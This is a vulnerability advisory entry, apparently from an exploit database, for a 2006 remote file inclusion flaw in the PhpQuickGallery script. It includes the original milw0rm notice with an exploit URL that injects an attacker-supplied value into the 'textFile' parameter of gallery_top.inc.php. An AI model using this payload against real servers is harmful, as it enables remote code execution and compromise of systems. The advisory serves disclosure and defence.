PhpQuickGallery Remot File Include

vendor:

phpquickgallery

by:

Al7ejaz Hacker

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: phpquickgallery

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PhpQuickGallery Remot File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'textFile' parameter to 'gallery_top.inc.php' script. A remote attacker can include and execute arbitrary local files, cause a denial of service or compromise a vulnerable system.

Mitigation:

Input validation should be used to prevent the execution of malicious code.

Source

Exploit-DB raw data:

============================================================================
+                                                                          =
+                     PhpQuickGallery  Remot File Include
+                                                                          =
+
+===========================================================================
+
+
+
+Script: phpquickgallery
+
+RisQe : Dangeureuse
+
+Type: Remot File Include
+
+File Infected : gallery_top.inc.php
+
+Credit By: Al7ejaz Hacker
+
+E-mail: saudi@hotmail.fr
+============================================================================
+
+
++++++++++++
+Exploit : +
++++++++++++
+
+http://localhost/phpquickgallery/gallery_top.inc.php?textFile=Attacker
+
+
+
+Discoverd By Al7ejaz Hacker
+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2006-11-19]